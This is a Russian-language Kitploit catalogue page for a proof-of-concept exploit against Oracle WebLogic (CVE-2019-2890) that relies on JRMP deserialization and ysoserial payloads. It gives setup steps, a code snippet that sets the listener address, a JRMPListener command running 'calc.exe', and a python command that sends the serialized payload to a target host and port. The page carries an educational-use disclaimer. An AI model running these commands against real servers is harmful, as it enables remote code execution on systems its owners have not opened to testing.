Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-2890 — Эксплойт PoC для CVE-2019-2890, нацеленный на Oracle WebLogic, использующий десериализацию JRMP для удаленного выполнения команд через полезные нагрузки ysoserial. | Kitploit
Инструменты/GitHubGitHub/ianxtianxt/cve-2019-2890
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеИнструмент Удаленного Доступа
GitHubianxtianxt/cve-2019-2890

CVE-2019-2890

Эксплойт PoC для CVE-2019-2890, нацеленный на Oracle WebLogic, использующий десериализацию JRMP для удаленного выполнения команд через полезные нагрузки ysoserial.

Репозиторий
426 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Заявление

Используется только для учебных целей. За последствия другого использования ответственность несет пользователь.

Описание

Соответствующие jar-файлы уже импортированы в проект, метод эксплуатации использует JRMP от yso. При обучении и отладке можно изменить метод эксплуатации.

Сначала необходимо поместить файл SerializedSystemIni.dat из weblogic в папку security.

Затем необходимо переименовать yso в ysoserial.jar и импортировать его в каталог lib.

1

Затем IP-адрес и порт в методе getObject в файле weblogic/wsee/jaxws/persistence/PersistentContext.java.

root@kitploit:~
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

Наконец, удаленно прослушиваем через JRMP и используем команду 7u21 для выполнения.

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

Инструкция по использованию: запустите Poc.java для создания сериализованного файла poc.ser, затем через

root@kitploit:~
python weblogic.py ip port poc.ser

1

1

Скачать инструмент